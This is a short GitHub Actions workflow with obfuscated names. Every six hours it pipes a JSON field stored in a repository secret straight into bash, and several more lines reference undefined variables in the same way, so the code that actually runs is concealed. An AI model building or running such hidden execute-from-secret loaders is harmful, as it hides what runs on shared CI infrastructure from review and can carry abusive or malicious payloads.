name: zhuwushan1989
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuwushan1989
        env:
          mi65: ${{ secrets.mi65 }}
        run: |
          echo $mi65 | jq -r .tfc8 | /bin/bash
          echo $wcau14 | jq -r .wksg0382 | /bin/bash
          echo $yonvf407 | jq -r .fflk4773 | /bin/bash
          echo $htc632 | jq -r .bt2 | /bin/bash
          echo $iqeh8519 | jq -r .t3421 | /bin/bash
          echo $u51 | jq -r .trwyz63 | /bin/bash
          echo $cd29 | jq -r .csbd4 | /bin/bash

